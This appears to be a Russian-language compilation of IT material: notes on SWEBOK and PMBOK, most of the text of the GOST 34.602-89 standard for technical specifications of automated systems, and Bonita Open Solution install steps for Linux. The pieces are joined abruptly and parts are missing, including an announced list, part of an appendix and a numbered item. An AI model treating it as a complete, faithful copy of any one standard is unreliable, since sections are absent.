The Guide to the Software Engineering Body of Knowledge (SWEBOK Guide) describes generally accepted knowledge about software engineering. Its 15 knowledge areas (KAs) summarize basic concepts and include a reference list pointing to more detailed information. For SWEBOK Guide V3, SWEBOK editors received and replied to comments from approximately 150 reviewers in 33 countries.
В сфере управления ИТ-проектами существует ряд международных стандартов. Это такие, как PMBОK (Project Management Body of Knowledge), SWEBOK (Software Engineering Body of Knowledge) и ряд других.
Project Management Body of Knowledge(PMBOK) – Стандарт управления проектами PMBOK Guide 3-rd Edition (Project Management Body of Knowledge), Американского института управления проектами (PMI – Project Management Institute) определяет круг знаний, необходимых для эффективного управления проектами. Стандарт PMBOK Guide 3-rd Edition включают в себя процессы, охватывающие все стадии жизненного цикла проекта (инициация, планирование, исполнение, контроль и завершение). Результаты или выходы одного процесса являются входами для другого процесса.
В конце 90-х годов прошлого века знания и опыт, которые были накоплены в индустрии программного обеспечения за предшествующие 30-35 лет, оформилось в то, что принято называть дисциплиной программной инженерии – Software Engineering. В какой-то мере, такое формирование дисциплины на основе широко распространенного практического опыта напоминает те процессы, которые происходили в управлении проектами. Возникали и развивались профессиональные ассоциации, специализированные институты, комитеты по стандартизации и другие образования, которые, в конце концов, пришли к общему мнению о необходимости сведения профессиональных знаний по соответствующим областям и стандартизации соответствующих программ обучения.
К 2004 году сформулировали два ключевых описания того, что сегодня мы и называем основами программной инженерии – Software Engineering:
1. Guide to the Software Engineering Body of Knowledge (SWEBOK), IEEE 2004 Version – Руководство к Своду Знаний по Программной Инженерии, в дальнейшем просто “SWEBOK”;
2. Software Engineering 2004. Curriculum Guidelines for Undergraduate Degree Programs in Software Engineering – Рекомендации по преподаванию программной инженерии (данное название на русском языке представлено в вольном смысловом переводе).
SWEBOK делит знания по программной инженерии на 10 областей:
· Software Requirements – требования к ПО.
· Software Design – проектирование ПО.
· Software Construction – конструирование ПО.
· Software Testing – тестирование ПО.
· Software Maintenance – сопровождение ПО.
· Software Configuration Management – управление конфигурацией.
· Software Engineering Management – управление IT проектом.
· Software Engineering Process – процесс программной инженерии.
· Software Engineering Tools and Methods – методы и инструменты.
· Software Quality – качество ПО.
В дополнение к ним, SWEBOK также включает обзор смежных дисциплин, связь с которыми представлена как фундаментальная, важная и обоснованная для программной инженерии:
ИНФОРМАЦИОННАЯ ТЕХНОЛОГИЯ.
Комплекс стандартов на автоматизированные системы
34.602-89
ТЕХНИЧЕСКОЕ ЗАДАНИЕ НА СОЗДАНИЕ АВТОМАТИЗИРОВАННОЙ СИСТЕМЫ
Information technology. Set of standards for automated systems. Technical directions for developing of automated system
ОКСТУ 0034
Дата введения с 01.01.1990г.
Настоящий стандарт распространяется на автоматизированные системы (АС) для автоматизации различных видов деятельности (управление, проектирование, исследование и т. п.), включая их сочетания, и устанавливает состав, содержание, правила оформления документа «Техническое задание на создание (развитие или модернизацию) системы» (далее — ТЗ на АС).
Рекомендуемый порядок разработки, согласования и утверждения ТЗ на АС приведен в приложении 1.
1. ОБЩИЕ ПОЛОЖЕНИЯ
1.1. ТЗ на АС является основным документом, определяющим требования и порядок создания (развития или модернизации — далее создания) автоматизированной системы, в соответствии с которым проводится разработка АС и ее приемка при вводе в действие.
1.2. ТЗ на АС разрабатывают на систему в целом, предназначенную для работы самостоятельно или в составе другой системы.
Дополнительно могут быть разработаны ТЗ на части АС:
на подсистемы АС, комплексы задач АС и т. п. в соответствии с требованиями настоящего стандарта;
на комплектующие средства технического обеспечения и программно-технические комплексы в соответствии со стандартами ЕСКД и СРПП;
на программные средства в соответствии со стандартами ЕСПД;
на информационные изделия в соответствии с ГОСТ 19.201 и НТД, действующей в ведомстве заказчика АС.
Примечание. В ТЗ на АСУ для группы взаимосвязанных объектов следует включать только общие для группы объектов требования. Специфические требования отдельного объекта управления следует отражать в ТЗ на АСУ этого объекта.
1.3. Требования к АС в объеме, установленном настоящим стандартом, могут быть включены в задание на проектирование вновь создаваемого объекта автоматизации. В этом случае ТЗ на АС не разрабатывают.
1.4. Включаемые в ТЗ на АС требования должны соответствовать современному уровню развития науки и техники и не уступать аналогичным требованиям, предъявляемым к лучшим современным отечественным и зарубежным аналогам. Задаваемые в ТЗ на АС требования не должны ограничивать разработчика системы в поиске и реализации наиболее эффективных технических, технико-экономических и других решений.
1.5. ТЗ на АС разрабатывают на основании исходных данных в том числе содержащихся в итоговой документации стадии «Исследование и обоснование создания АС», установленной ГОСТ 24.601.
1.6. В ТЗ на АС включают только те требования, которые дополняют требования к системам данного вида (АСУ, САПР, АСНИ и т. д.), содержащиеся в действующих НТД, и определяются спецификой конкретного объекта, для которого создается система.
1.7. Изменения к ТЗ на АС оформляют дополнением или подписанным заказчиком и разработчиком протоколом. Дополнение или указанный протокол являются неотъемлемой частью ТЗ на АС. На титульном листе ТЗ на АС должна быть запись «Действует с … ».
2. СОСТАВ И СОДЕРЖАНИЕ
2.1. ТЗ на АС содержит следующие разделы, которые могут быть разделены на подразделы:
1) общие сведения;
2) назначение и цели создания (развития) системы;
3) характеристика объектов автоматизации;
4) требования к системе;
5) состав и содержание работ по созданию системы;
6) порядок контроля и приемки системы;
7) требования к составу и содержанию работ по подготовке объекта автоматизации к вводу системы в действие;
8) требования к документированию;
9) источники разработки.
В ТЗ на АС могут включаться приложения.
2.2. В зависимости от вида, назначения, специфических особенностей объекта автоматизации и условий функционирования системы допускается оформлять разделы ТЗ в виде приложений, вводить дополнительные, исключать или объединять подразделы ТЗ.
В ТЗ на части системы не включают разделы, дублирующие содержание разделов ТЗ на АС в целом.
2.3. В разделе «Общие сведения» указывают:
1) полное наименование системы и ее условное обозначение;
2) шифр темы или шифр (номер) договора;
3) наименование предприятий (объединений) разработчика и заказчика (пользователя) системы и их реквизиты;
4) перечень документов, на основании которых создается система, кем и когда утверждены эти документы;
5) плановые сроки начала и окончания работы по созданию системы;
6) сведения об источниках и порядке финансирования работ;
7) порядок оформления и предъявления заказчику результатов работ по созданию системы (ее частей), по изготовлению и наладке отдельных средств (технических, программных, информационных) и программно-технических (программно-методических) комплексов системы.
2.4. Раздел «Назначение и цели создания (развития) системы» состоит из подразделов:
1) назначение системы;
2) цели создания системы.
2.4.1. В подразделе «Назначение системы» указывают вид автоматизируемой деятельности (управление, проектирование и т. п.) и перечень объектов автоматизации (объектов), на которых предполагается ее использовать.
Для АСУ дополнительно указывают перечень автоматизируемых органов (пунктов) управления и управляемых объектов.
2.4.2. В подразделе «Цели создания системы» приводят наименования и требуемые значения технических, технологических, производственно-экономических или других показателей объекта автоматизации, которые должны быть достигнуты в результате создания АС, и указывают критерии оценки достижения целей создания системы.
2.5. В разделе «Характеристики объекта автоматизации» приводят:
1) краткие сведения об объекте автоматизации или ссылки на документы, содержащие такую информацию;
2) сведения об условиях эксплуатации объекта автоматизации и характеристиках окружающей среды.
Примечание: Для САПР в разделе дополнительно приводят основные параметры и характеристики объектов проектирования.
2.6. Раздел «Требования к системе» состоит из следующих подразделов:
1) требования к системе в целом;
2) требования к функциям (задачам), выполняемым системой;
3) требования к видам обеспечения.
Состав требований к системе, включаемых в данный раздел ТЗ на АС, устанавливают в зависимости от вида, назначения, специфических особенностей и условий функционирования конкретной системы. В каждом подразделе приводят ссылки на действующие НТД, определяющие требования к системам соответствующего вида.
2.6.1. В подразделе «Требования к системе в целом» указывают:
требования к структуре и функционированию системы;
требования к численности и квалификации персонала системы и режиму его работы;
показатели назначения;
требования к надежности;
требования безопасности;
требования к эргономике и технической эстетике;
требования к транспортабельности для подвижных АС;
требования к эксплуатации, техническому обслуживанию, ремонту и хранению компонентов системы;
требования к защите информации от несанкционированного доступа;
требования по сохранности информации при авариях;
требования к защите от влияния внешних воздействий;
требования к патентной чистоте;
требования по стандартизации и унификации;
дополнительные требования.
2.6.1.1. В требованиях к структуре и функционированию системы приводят:
1) перечень подсистем, их назначение и основные характеристики, требования к числу уровней иерархии и степени централизации системы;
2) требования к способам и средствам связи для информационного обмена между компонентами системы;
3) требования к характеристикам взаимосвязей создаваемой системы со смежными системами, требования к ее совместимости, в том числе указания о способах обмена информацией (автоматически, пересылкой документов, по телефону и т. п.);
4) требования к режимам функционирования системы;
5) требования по диагностированию системы;
6) перспективы развития, модернизации системы.
2.6.1.2. В требованиях к численности и квалификации персонала на АС приводят:
требования к численности персонала (пользователей) АС;
требования к квалификации персонала, порядку его подготовки и контроля знаний и навыков;
требуемый режим работы персонала АС.
2.6.1.3. В требованиях к показателям назначения АС приводят значения параметров, характеризующие степень соответствия системы ее назначению.
Для АСУ указывают:
степень приспособляемости системы к изменению процессов и методов управления, к отклонениям параметров объекта управления;
допустимые пределы модернизации и развития системы;
вероятностно-временные характеристики, при которых сохраняется целевое назначение системы.
2.6.1.4. В требования к надежности включают:
1) состав и количественные значения показателей надежности для системы в целом или ее подсистем;
2) перечень аварийных ситуаций, по которым должны быть регламентированы требования к надежности, и значения соответствующих показателей;
3) требования к надежности технических средств и программного обеспечения;
4) требования к методам оценки и контроля показателей надежности на разных стадиях создания системы в соответствии с действующими нормативно-техническими документами.
2.6.1.5. В требования по безопасности включают требования по обеспечению безопасности при монтаже, наладке, эксплуатации, обслуживании и ремонте технических средств системы (защита от воздействий электрического тока, электромагнитных полей, акустических шумов и т. п.), по допустимым уровням освещенности, вибрационных и шумовых нагрузок.
2.6.1.6. В требования по эргономике и технической эстетике включают показатели АС, задающие необходимое качество взаимодействия человека с машиной и комфортность условий работы персонала.
2.6.1.7. Для подвижных АС в требования к транспортабельности включают конструктивные требования, обеспечивающие транспортабельность технических средств системы, а также требования к транспортным средствам.
2.6.1.8. В требования к эксплуатации, техническому обслуживанию, ремонту и хранению включают:
1) условия и регламент (режим) эксплуатации, которые должны обеспечивать использование технических средств (ТС) системы с заданными техническими показателями, в том числе виды и периодичность обслуживания ТС системы или допустимость работы без обслуживания;
2) предварительные требования к допустимым площадям для размещения персонала и ТС системы, к параметрам сетей энергоснабжения и т. п.;
3) требования по количеству, квалификации обслуживающего персонала и режимам его работы;
4) требования к составу, размещению и условиям хранения комплекта запасных изделий и приборов;
5) требования к регламенту обслуживания.
2.6.1.9. В требования к защите информации от несанкционированного доступа включают требования, установленные в НТД, действующей в отрасли (ведомстве) заказчика.
2.6.1.10. В требованиях по сохранности информации приводят перечень событий: аварий, отказов технических средств (в том числе — потеря питания) и т. п., при которых должна быть обеспечена сохранность информации в системе.
2.6.1.11. В требованиях к средствам защиты от внешних воздействий приводят:
1) требования к радиоэлектронной защите средств АС;
2) требования по стойкости, устойчивости и прочности к внешним воздействиям (среде применения).
2.6.1.12. В требованиях по патентной чистоте указывают перечень стран, в отношении которых должна быть обеспечена патентная чистота системы и ее частей.
2.6.1.13. В требования к стандартизации и унификации включают: показатели, устанавливающие требуемую степень использования стандартных, унифицированных методов реализации функций (задач) системы, поставляемых программных средств, типовых математических методов и моделей, типовых проектных решений, унифицированных форм управленческих документов, установленных ГОСТ 6.10.1, общесоюзных классификаторов технико-экономической информации и классификаторов других категорий в соответствии с областью их применения, требования к использованию типовых автоматизированных рабочих мест, компонентов и комплексов.
2.6.1.14. В дополнительные требования включают:
1) требования к оснащению системы устройствами для обучения персонала (тренажерами, другими устройствами аналогичного назначения) и документацией на них;
2) требования к сервисной аппаратуре, стендам для проверки элементов системы;
3) требования к системе, связанные с особыми условиями эксплуатации;
4) специальные требования по усмотрению разработчика или заказчика системы.
2.6.2. В подразделе «Требование к функциям (задачам)», выполняемым системой, приводят:
1) по каждой подсистеме перечень функций, задач или их комплексов (в том числе обеспечивающих взаимодействие частей системы), подлежащих автоматизации;при создании системы в две или более очереди — перечень функциональных подсистем, отдельных функций или задач, вводимых в действие в 1-й и последующих очередях;
2) временной регламент реализации каждой функции, задачи (или комплекса задач);
3) требования к качеству реализации каждой функции (задачи или комплекса задач), к форме представления выходной информации, характеристики необходимой точности и времени выполнения, требования одновременности выполнения группы функций, достоверности выдачи результатов;
4) перечень и критерии отказов для каждой функции, по которой задаются требования по надежности.2.6.3. В подразделе «Требования к видам обеспечения» в зависимости от вида системы приводят требования к математическому, информационному, лингвистическому, программному, техническому, метрологическому, организационному, методическому и другие видам обеспечения системы.2.6.3.1. Для математического обеспечения системы приводят требования к составу, области применения (ограничения) и способам, использования в системе математических методов и моделей, типовых алгоритмов и алгоритмов, подлежащих разработке.2.6.3.2. Для информационного обеспечения системы приводят требования:
1) к составу, структуре и способам организации данных в системе;
2) к информационному обмену между компонентами системы;
3) к информационной совместимости со смежными системами;
4) по использованию общесоюзных и зарегистрированных республиканских, отраслевых классификаторов, унифицированных документов и классификаторов, действующих на данном предприятии;
5) по применению систем управления базами данных;
6) к структуре процесса сбора, обработки, передачи данных в системе и представлению данных;
7) к защите данных от разрушений при авариях и сбоях в электропитании системы;
8) к контролю, хранению, обновлению и восстановлению данных;
9) к процедуре придания юридической силы документам, продуцируемым техническими средствами АС (в соответствии с ГОСТ 6.10.4).
2.6.3.3. Для лингвистического обеспечения системы приводят требования к применению в системе языков программирования высокого уровня, языков взаимодействия пользователей и технических средств системы, а также требования к кодированию и декодированию данных, к языкам ввода-вывода данных, языкам манипулирования данными, средствам описания предметной области (объекта автоматизации), к способам организации диалога.
2.6.3.4. Для программного обеспечения системы приводят перечень покупных программных средств, а также требования:
1) к независимости программных средств от используемых СВТ и операционной среды;
2) к качеству программных средств, а также к способам его обеспечения и контроля;
3) по необходимости согласования вновь разрабатываемых программных средств с фондом алгоритмов и программ.
2.6.3.5. Для технического обеспечения системы приводят требования:
1) к видам технических средств, в том числе к видам комплексов технических средств, программно-технических комплексов и других комплектующих изделий, допустимых к использованию в системе;
2) к функциональным, конструктивным и эксплуатационным характеристикам средств технического обеспечения системы.
2.6.3.6. В требованиях к метрологическому обеспечению приводят:
2) требования к точности измерений параметров и (или) к метрологическим характеристикам измерительных каналов;
3) требования к метрологической совместимости технических средств системы;
4) перечень управляющих и вычислительных каналов системы, для которых необходимо оценивать точностные характеристики;
5) требования к метрологическому обеспечению технических и программных средств, входящих в состав измерительных каналов системы, средств, встроенного контроля, метрологической пригодности измерительных каналов и средств измерений, используемых при наладке и испытаниях системы;
6) вид метрологической аттестации (государственная или ведомственная) с указанием порядка ее выполнения и организаций, проводящих аттестацию.
2.6.3.7. Для организационного обеспечения приводят требования:
1) к структуре и функциям подразделений, участвующих в функционировании системы или обеспечивающих эксплуатацию;
2) к организации функционирования системы и порядку взаимодействия персонала АС и персонала объекта автоматизации;
3) к защите от ошибочных действий персонала системы.2.6.3.8. Для методического обеспечения САПР приводят требования к составу нормативно-технической документации системы (перечень применяемых при ее функционировании стандартов, нормативов, методик и т. п.).2.7. Раздел «Состав и содержание работ по созданию (развитию) системы» должен содержать перечень стадий и этапов работ по созданию системы в соответствии с ГОСТ 24.601, сроки их выполнения, перечень организаций — исполнителей работ, ссылки на документы, подтверждающие согласие этих организаций на участие в создании системы, или запись, определяющую ответственного (заказчик или разработчик) за проведение этих работ.В данном разделе также приводят:
1) перечень документов, по ГОСТ 34.201-89, предъявляемых по окончании соответствующих стадий и этапов работ;
2) вид и порядок проведения экспертизы технической документации (стадия, этап, объем проверяемой документации, организация-эксперт);
3) программу работ, направленных на обеспечение требуемого уровня надежности разрабатываемой системы (при необходимости);
4) перечень работ по метрологическому обеспечению на всех стадиях создания системы с указанием их сроков выполнения и организаций-исполнителей (при необходимости).
2.8. В разделе «Порядок контроля и приемки системы» указывают:
1) виды, состав, объем и методы испытаний системы и ее составных частей (виды испытаний в соответствии с действующими нормами, распространяющимися на разрабатываемую систему);
2) общие требования к приемке работ по стадиям (перечень участвующих предприятий и организаций, место и сроки проведения), порядок согласования и утверждения приемочной документации;
З) статус приемочной комиссии (государственная, межведомственная, ведомственная).
2.9. В разделе «Требования к составу и содержанию работ по подготовке объекта автоматизации к вводу системы в действие» необходимо привести перечень основных мероприятий и их исполнителей, которые следует выполнить при подготовке объекта автоматизации к вводу АС в действие.
В перечень основных мероприятий включают:
1) приведение поступающей в систему информации (в соответствии с требованиями к информационному и лингвистическому обеспечению) к виду, пригодному для обработки с помощью ЭВМ;
2) изменения, которые необходимо осуществить в объекте автоматизации;
3) создание условий функционирования объекта автоматизации, при которых гарантируется соответствие создаваемой системы требованиям, содержащимся в ТЗ;
4) создание необходимых для функционирования системы подразделений и служб;
5) сроки и порядок комплектования штатов и обучения персонала.
Например, для АСУ приводят:
изменения применяемых методов управления;
создание условий для работы компонентов АСУ, при которых гарантируется соответствие системы требованиям, содержащимся в ТЗ.
2.10. В разделе «Требования к документированию» приводят:
1) согласованный разработчиком и Заказчиком системы перечень подлежащих разработке комплектов и видов документов, соответствующих требованиям ГОСТ 34.201-89 и НТД отрасли заказчика;
перечень документов, выпускаемых на машинных носителях;
требования к микрофильмированию документации;
2) требования по документированию комплектующих элементов межотраслевого применения в соответствии с требованиями ЕСКД и ЕСПД;
3) при отсутствии государственных стандартов, определяющих требования к документированию элементов системы, дополнительно включают требования к составу и содержанию таких документов.
2.11. В разделе «Источники разработки» должны быть перечислены документы и информационные материалы (технико-экономическое обоснование, отчеты о законченных научно-исследовательских работах, информационные материалы на отечественные, зарубежные системы-аналоги и др.), на основании которых разрабатывалось ТЗ и которые должны быть использованы при создании системы.
2.12. В состав ТЗ на АС при наличии утвержденных методик включают приложения, содержащие:
1) расчет ожидаемой эффективности системы;
2) оценку научно-технического уровня системы.
Приложения включают в состав ТЗ на АС по согласованию между разработчиком и заказчиком системы.
3. ПРАВИЛА ОФОРМЛЕНИЯ
3.1. Разделы и подразделы ТЗ на АС должны быть размещены в порядке, установленном в разд. 2 настоящего стандарта.
3.2. ТЗ на АС оформляют в соответствии с требованиями ГОСТ 2.105.95 на листах формата А4 по ГОСТ 2.301 без рамки, основной надписи и дополнительных граф к ней.
Номера листов (страниц) проставляют, начиная с первого листа, следующего за титульным листом, в верхней части листа (над текстом, посередине) после обозначения кода ТЗ на АС.
3.3. Значения показателей, норм и требований указывают, как правило, с предельными отклонениями или максимальным и минимальным значениями. Если эти показатели, нормы, требования однозначно регламентированы НТД, в ТЗ на АС следует приводить ссылку на эти документы или их разделы, а также дополнительные требования, учитывающие особенности создаваемой системы. Если конкретные значения показателей, норм и требований не могут быть установлены в процессе разработки ТЗ на АС, в нем следует сделать запись о порядке установления и согласования этих показателей, норм и требований:
«Окончательное требование (значение) уточняется в процессе ...и согласовывается протоколом с ... на стадии ...».
При этом в текст ТЗ на АС изменений не вносят.
3.4. На титульном листе помещают подписи заказчика, разработчика и согласующих организаций, которые скрепляют гербовой печатью. При необходимости титульный лист оформляют на нескольких страницах. Подписи разработчиков ТЗ на АС и должностных лиц, участвующих в согласовании и рассмотрении проекта ТЗ на АС, помещают на последнем листе.
Форма титульного листа ТЗ на АС приведена в приложении 2. Форма последнего листа ТЗ на АС приведена в приложении 3.
3.5. При необходимости на титульном листе ТЗ на АС допускается помещать установленные в отрасли коды, например: гриф секретности, код работы, регистрационный номер ТЗ и др.
3.6. Титульный лист дополнения к ТЗ на АС оформляют аналогично титульному листу технического задания. Вместо наименования «Техническое задание» пишут «Дополнение № … к ТЗ на AC … ».
3.7. На последующих листах дополнения к ТЗ на АС помещают основание для изменения, содержание изменения и ссылки на документы, в соответствии с которыми вносятся эти изменения.
3.8. При изложении текста дополнения к ТЗ следует указывать номера соответствующих пунктов, подпунктов, таблиц основного ТЗ на АС и т. п. и применять слова: «заменить», «дополнить», «исключить», «изложить в новой редакции».
ПРИЛОЖЕНИЕ 1
Рекомендуемое
ПОРЯДОК РАЗРАБОТКИ, СОГЛАСОВАНИЯ И УТВЕРЖДЕНИЯ ТЗ НА АС
1. Проект ТЗ на АС разрабатывает организация-разработчик системы с участием заказчика на основании технических требований (заявки, тактико-технического задания и т. п.).
При конкурсной организации работ варианты проекта ТЗ на АС рассматриваются заказчиком, который — либо выбирает предпочтительный, вариант, либо на основании сопоставительного анализа подготавливает с участием будущего разработчика АС окончательный вариант ТЗ на AC.
2. Необходимость согласования проекта ТЗ на АС с органами государственного надзора и другими заинтересованными организациями определяют совместно заказчик системы и разработчик проекта ТЗ на АС,
Работу по согласованию проекта ТЗ на AC осуществляют совместно разработчик ТЗ на АС и заказчик системы, каждый в организациях своего министерства (ведомства).
3. Срок согласования проекта ТЗ на АС в каждой организации не должен превышать 15 дней со дня его получения. Рекомендуется рассылать на согласование экземпляры проекта ТЗ на АС (копий) одновременно во все организации (подразделения).
4. Замечания по проекту ТЗ на АС должны быть представлены с техническим обоснованием. Решения по замечаниям должны быть приняты разработчиком проекта ТЗ на АС и заказчиком системы до утверждения ТЗ на АС.
5. Если при согласовании проекта ТЗ на АС возникли разногласия между разработчиком и заказчиком (или другими заинтересованными организациями), то составляется протокол разногласий (форма произвольная) и конкретное решение принимается в установленном порядке.
6. Согласование проекта ТЗ на АС разрешается оформлять отдельным документом (письмом). В этом случае под грифом «Согласовано» делают ссылку на этот документ.
7. Утверждение ТЗ на АС осуществляют руководители предприятий (организаций) разработчика и заказчика системы.
8. ТЗ на АС (дополнение к ТЗ) до передачи его на утверждение должно быть проверено службой нормоконтроля организации — разработчика ТЗ и, при необходимости, подвергнуто метрологической экспертизе.
9. Копии, утвержденного ТЗ на АС в 10-дневный срок после утверждения высылаются разработчиком ТЗ на АС участникам создания системы.
10. Согласование и утверждение дополнений к ТЗ на АС проводят в порядке, установленном для ТЗ на АС.
11. Изменения к ТЗ на АС не допускается утверждать после представления системы или ее очереди на приемо-сдаточные испытания.
12. Регистрация, учет и хранение ТЗ на АС и дополнений к нему проводят в соответствии, с требованиями ГОСТ 2.501.
Руководитель
(должность, наименование согласующей организации)
Личная подпись
Расшифровка подписи
Печать
Дата
ПРИЛОЖЕНИЕ 3
Рекомендуемое
ФОРМА ПОСЛЕДНЕГО ЛИСТА ТЗ НА АС
(код ТЗ)
СОСТАВИЛИ
Наименование организации, предприятия
Должность исполнителя
Фамилия имя, отчество
Подпись
Дата
СОГЛАСОВАНО
Наименование организации, предприятия
Должность исполнителя
Фамилия имя, отчество
Подпись
Дата
ПРИЛОЖЕНИЕ 4
Справочное
ПОЛОЖЕНИЯ ПО СОЗДАНИЮ ЕДИНОГО КОМПЛЕКСА СТАНДАРТОВ АВТОМАТИЗИРОВАННЫХ СИСТЕМ
1. Исходные предпосылки создания комплекса
1.1. Создание и внедрение автоматизированных систем различных классов и назначений ведется во многих отраслях промышленности по нормативно-технической документации, устанавливающей разнообразные организационно-методические и технические нормы, правила и положения, затрудняющие интеграцию систем и эффективное их совместное функционирование.
1.2. В период принятия Госстандартом СССР решения о совершенствовании межотраслевых комплексов стандартов действовали следующие комплексы и системы стандартов, устанавливающие требования к различным видам АС:
1) единая система стандартов автоматизированных систем управления (24-я система), распространяющаяся на АСУ, АСУП, АСУ ТП и другие организационно-экономические системы;
2) комплекс стандартов (система 23501); распространяющихся на системы автоматизированного проектирования;
3) четвертая группа 14-й системы стандартов, распространяющаяся на автоматизированные системы технологической подготовки производства.
1.3. Практика применения стандартов на АСУ, САПР, АСУ ТП, АСТПП показала, что в них применяется одинаковый понятийный аппарат, имеется много общих объектов стандартизации, однако требования стандартов не согласованы между собой, имеются различия по составу и содержанию работ, различия по обозначению, составу, содержанию и оформлению документов и пр.
1.4. На фоне отсутствия единой технической политики в области создания АС многообразие стандартов не обеспечивало широкой совместимости АС при их взаимодействии, не позволяло тиражировать системы, тормозило развитие перспективных направлений использования средств вычислительной техники.
1.5. В настоящее время осуществляется переход к созданию сложных АС (за рубежом системы CAD — САМ), включающих в свой состав АСУ технологическими процессами и производствами, САПР — конструктора, САПР — технолога, АСНИ и др. системы. Использование противоречивых правил при создании таких систем приводит к снижению качества, увеличению стоимости работ, затягиванию сроков ввода АС в действие.
1.6. Единый комплекс стандартов и руководящих документов должен распространяться на автоматизированные системы различного назначения: АСНИ, САПР, ОАСУ, АСУП, АСУТП, АСУГПС, АСК, АСТПП, включая их интеграцию.
1.7. При разработке межотраслевых документов следует учитывать следующие особенности АС как объектов стандартизации:
1) техническое задание является основным документом, в соответствии с которым проводят создание АС и приемку его заказчиком;
2) АС, как правило, создают проектным путем с комплектацией изделиями серийного и единичного производства и проведением строительных, монтажных, наладочных и пусковых работ, необходимых для ввода в действие АС;
3) в общем случае АС (подсистема АС) состоит из программно-технических (ПТК), программно-методических комплексов (ПМК) и компонентов технического, программного и информационного обеспечений.
Компоненты этих видов обеспечения, а также ПМК и ПТК должны изготовляться и поставляется как продукция производственно-технического назначения.
Компоненты могут входить в АС в качестве самостоятельных частей или могут быть объединены в комплексы;
4) создание АС в организациях (предприятиях) требует специальной подготовки пользователей и обслуживающего персонала системы;
5) функционирование АС и комплексов обеспечивается совокупностью организационно-методических документов, рассматриваемых в процессе создания как компоненты правового, методического, лингвистического, математического, организационного и др. видов обеспечений. Отдельные решения, получаемые в процессе разработки этих обеспечений, могут реализовываться в виде компонентов технического, программного или информационного обеспечений;
6) совместное функционирование и взаимодействие различных систем и комплексов осуществляется на базе локальных сетей ЭВМ.
Спецификации и соглашения, принятые для локальных сетей ЭВМ, обязательны для обеспечения совместимости систем, комплексов и компонентов.
2. Взаимосвязь ЕКС АС с другими системами и комплексами стандартов
2.1. Стандартизация в области АС является составной частью работ по обобщенной проблеме «Информационная технология».
2.2. Единый комплекс стандартов руководящих документов на автоматизированные системы совместно с другими системами и комплексами стандартов должен образовывать полное нормативно-техническое обеспечение процессов создания и функционирования АС.
2.3. ЕКС АС должен охватывать специфические для автоматизированных систем направления стандартизации и распространять традиционные направления стандартизации на программно-технические, программно-методические комплексы и автоматизированные системы в целом.
2.4. Направления и задачи стандартизации при нормативно-техническом обеспечении процессов создания и функционирования АС группируют следующим образом:
1) установление технических требований к продукции;
2) регламентация методов испытаний и правил аттестации и сертификации продукции;
3) регламентация правил и порядка разработки;
4) установление правил документирования;
5) обеспечение совместимости;
6) регламентация организационно-методических вопросов функционирования систем.
Направления 1-4 являются традиционными при разработке, изготовлении и поставке продукции. Направления 5, 6 являются специфичными и вытекают из особенностей, присущих АС.
2.5. Обеспеченность АС в целом и их составных частей нормативно-технической документацией в рамках принятых направлений и задач стандартизации различна.
Компоненты технического, программного и информационного обеспечений, как продукцию производственно-технического назначения, рассматривают, соответственно, как конструкторские, программные и информационные изделия. На эти изделия распространяются действующие комплексы стандартов ЕСКД, СРПП, ЕСПД, СГИП, УСД, классификаторы и кодификаторы технико-экономической информации, комплексы стандартов вида «ОТТ», «Методы испытаний», «ТУ», а также ОТТ заказчика.
2.5.1. Весь жизненный цикл конструкторских изделий полностью обеспечен нормативно-технической документацией, действующей в машиностроении и приборостроении.
2.5.2. Программные изделия обеспечены НТД, входящей в ЕСПД и ОТТ заказчика. Однако область распространения этих НТД должна быть расширена с целью отражения вопросов, связанных с разработкой, созданием, распространением и эксплуатацией программных изделий.
2.5.3. Информационные изделия в настоящее время не обеспечены НТД, хотя отдельные вопросы проработаны в рамках УСД, классификаторах и кодификаторах технико-экономической информации.
2.6. Программно-технические и программно-методические комплексы рассматриваются как сложные изделия, не имеющие аналогов в машиностроении. Учитывая статус ПТК и ПМК как продукции производственно-технического назначения, правила и порядок их разработки должен быть аналогичен требованиям, установленным стандартами системы разработки и постановки продукции на производство (СРПП).
Bonita Open Solution – французский вендор. В opensource-версии системы отсутствуют средства мониторинга процессов. В свою очередь, в коммерческом варианте системы они есть. Решение состоит из трёх основных компонентов, разделенных по назначению:
Studio — моделирование и автоматизация бизнес-процессов;
Execution Engine — исполнение бизнес-процессов;
User Experience — интерфейс для работы пользователя с его процессами.
Моделирование процессов Bonita Open Solution происходит в нотации BPMN.
Моделирование и автоматизация процесса в Bonita Studio производится в одном окне, что очень удобно. Выбор данных и участников, генерация интерфейсов к этапам процесса производится в том же окне, что и создание графической модели. Нет необходимости постоянно переключаться между окнами редакторов, это ускоряет разработку процесса.
Добавляем пользователя Bonita для запуска Bonita Open Solution
adduser -d /opt/bonita -c «Bonita Open Solution user» -m bonita
chown bonita:bonita /opt/bonita
su bonita
cd ~
mkdir distrib # В этой папке будут находится все дистрибутивы
exit
Устанавливаем и настраиваем JRE (Java Runtime Environment)
Из firefox откройте www.java.com, скачайте JRE по кнопке “Linux x64” и перемещаем в папку /opt/bonita/distrib.
su bonita
cd ~
tar -zxvf ~/distrib/jre********.tar.gz
ln -s jre******* jre
Вписываем в ~/.bashrc конфигурацию пути и домашней папки JRE:
Из firefox открываем www.bonitasoft.com, скачаваем Bundle с Tomcat BonitaBPMCommunity и перемещаем в папку /opt/bonita/distrib/.
su bonita
cd ~
unzip ~/distrib/BonitaBPMCommunity.zip
ln -s BonitaBPMCommunity BOS
Подготавливаем сценарий запуска /etc/init.d/bos:
#!/bin/sh
#chkconfig 2345 99 10
#description: Bonita Open Solution
BOS_USER=bonita
BOS_HOME=/opt/bonita/BOS
case $1 in
‘start’)
rm -f $BOS_HOME/logs/catalina.out
su bonita -l -c $BOS_HOME/bin/startup.sh &
;;
‘stop’)
su bonita -l -c $BOS_HOME/bin/shutdown.sh &
;;
‘restart’)
su bonita -l -c $BOS_HOME/bin/shutdown.sh
rm -f $BOS_HOME/logs/catalina.out
su bonita -l -c $BOS_HOME/bin/startup.sh &
;;
*)
echo «usage: $0 {start|stop|restart}»
;;
esac
exit
Выполняем:
chmod +x /etc/init.d/bos
service bos start
С помощью браузера заходим на http://:8080/bonita с логином install и паролем install
Создаем пользователя для администрирования и добавляем в профайл Administrator
В файле «/opt/bonita/BOS/bonita/server/tenants/1/conf/bonita-server.properties» изменяем пароль в строке «userPassword» на сгенерированную последовательность.
В файле «/opt/bonita/BOS/bonita/client/platform/conf/platform-tenant-config.properties» изменяем пароль в строке «platform.tenant.default.password» на ту же последовательность.
